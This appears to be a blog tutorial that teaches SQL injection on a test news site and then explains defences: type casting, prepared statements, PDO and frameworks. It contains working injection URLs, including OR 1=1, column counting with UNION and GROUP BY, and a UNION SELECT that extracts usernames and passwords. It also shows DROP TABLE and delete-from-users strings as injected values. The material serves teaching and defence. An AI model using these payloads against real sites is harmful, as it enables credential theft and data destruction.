SQL (Structured Query Language) is a powerful language for working with relational databases, but quite a few people are in fact ignorant of the dark side of this language, which is called SQL-injection. Anyone who knows this language well enough can extract the needed data from your site by means of SQL – unless developers build defenses against SQL-injection, of course. Let’s discuss how to hack data and how to secure your web resource from these kinds of data leaks!
How to use SQL injection
SQL injection is in fact a technique that can extract secret data from a database or destroy it. Hackers enter a malicious code into SQL statements via web page input and get all the data in which they are interested.
The SQL injection topic is too intricate to address the theoretical part, so the effectiveness of SQL injection will be shown in examples. We will create a one page test news site, where news will be pulled up. First, we create a news table:
CREATE TABLE news ( id INT PRIMARY KEY AUTO_INCREMENT, text VARCHAR(255), public TINYINT, price INT, popularity VARCHAR(255) )
And a site page with a simple design (that page html, incl. db migration, you might get here in case you wanna try it yourself). The news items are rendered thru requests with GET parameter id:
Find a chink
Now we will test SQL-injections (SQLI). The first step – find the chink in website (incl. db) functionality. In an address bar given http://sqlinjection/view.php?id=1, if we change the address to http://sqlinjection/view.php?id=1″ (note a double quote at the end of the url) the site will show an error:
Ok, we have found the error. It’s caused by the incorrect site php code:
$id = $_GET['id']; // Here $id is a parameter “id” from address bar
How to protect a website from this kind of injection, we will discuss a bit later. Now we will see how hackers take advantage of this kind of loose php script to SQL query sintax.
Quick start. Apply injection into the SQL query
For example, we have a page that executes only one record. To extract all records we should use the following malicious query:
http://sqlinjection/view.php?id=1+OR+1=1
In fact, if that url input parameter is not sanitized, we get a db query this way:
SELECT * FROM `posts` WHERE id = 1 OR 1 = 1
Because of 1=1 is always true, we get all data from the table. So, we have found the first exception (injection vulnerability)!
Get ready for attack!
We know that the website has flaws, so in the next stage we need to use an SQL operator called UNION. By way of the result of the UNION SELECT construction, we can inquire how many columns a table has.
Let’s try to get the quantity of columns by the trial-and-error method.
http://sqlinjection/index.php?id=1+UNION+SELECT+1,2
Returns error…
http://sqlinjection/index.php?id=1+UNION+SELECT+1,2,3
Error…
http://sqlinjection/index.php?id=1+UNION+SELECT+1,2,3,4,5
SQL query in this case is:
SELECT * FROM `news` WHERE id = 1 UNION SELECT 1,2,3,4,5
Yes! No errors, there are five columns in the news table. This information about the table can help us to extract data from other tables or to change it. To make it easier, try using GROUP BY instead of UNION SELECT
http://sqlinjection/index.php?id=1+GROUP+BY+4
Here SQL-query is:
SELECT * FROM `posts` WHERE id = 1 GROUP BY 4
No errors, the count of columns is more than four.
http://sqlinjection/index.php?id=1+GROUP+BY+8
Oops, error… then the column count is less than 8.
So, we enquire using a range which is between 4 and 8. Then we try “GROUP BY 5” and “GROUP BY 7” and there is an answer – 6 columns. GROUP BY is easier, but we use UNION as an example because this is a popular operator for SQLI. Also, ORDER BY can be used.
Let us suppose that we know that in the DB there is a users table. To extract data from the users table we could use the following:
http://sqlinjection/view.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+users+WHERE+id=1
Without errors! That’s how we get a record from a user table. We set the id value “-1” to dispose of unnecessary records from the news table, so if you don’t want to get a record from db – all you need is to set a nonexistent id, for example, -1.
Are there any other records in the table users?
http://sqlinjection/view.php?id=-1+UNION+SELECT+1,2,3,4,5+FROM+users+WHERE+id=2
No, there is only one record in that table. Now, instead of first and second column we set “username” and “password” (as is usually possible):
http://sqlinjection/view.php?id=-1+UNION+SELECT+username,password,3,4,5+FROM+users+WHERE+id=1
Here, injecting a SQL code through the web url we got data from an another table! As you can see, the UNION is a very powerful instrument in SQL injection.
Building a defense against SQL-injection
People used to think that it’s easier to attack than to protect. In the SQL injection world nowadays, it’s easier to protect than to attack. All you need is to filter input data:
$id = (int)$_GET['id'];
This approach is called type casting. Now the id parameter can be only of an integer type. When we try to put in the extra characters “ ‘ ” the php sanitizing script filters it out:
As the result: no errors!
And when we retry entering the request by extracting username and password we will see:
Prepared statement in SQL
Prepared statement is a convenient feature to execute SQL queries with high efficiency. It’s a SQL query template which is using as filter-layer to connect to the database. Each character is prepared to be stored into db table. If I want to store car”); delete from users; (with double quote) the statement will not mix the last double quote with queries’ quote by escaping special characters, e.g.
INSERT INTO utility (id, item) VALUES (2, “car\””)
This prevents harmful injections like this: car”); delete from users;
PHP PDO
Always use PDO (php data object) in your PHP-projects. PDO provides security in working with a DB by using correctly prepared statements:
$name = "Evil'); DROP TABLE drop_table;--"; $sql = "INSERT INTO `pupils` (`John`) values(?);"; $statement = $db->prepare($sql); $statement->execute([$name]);
If we don’t use prepared statements, our db tables would be at risk of exposure or deletion.
Frameworks
Also, you can use frameworks (Laravel, Yii2, Symphony, etc.). They have an additional ORM layer with correctly prepared SQL queries.
Happy Ending
Nowadays, SQL injections are not as popular as 15 years ago. All you need is to take advantage of this basic advice to protect your web resource. We strongly recommend using SQL injections for fun, and don’t forget to protect yourself from them.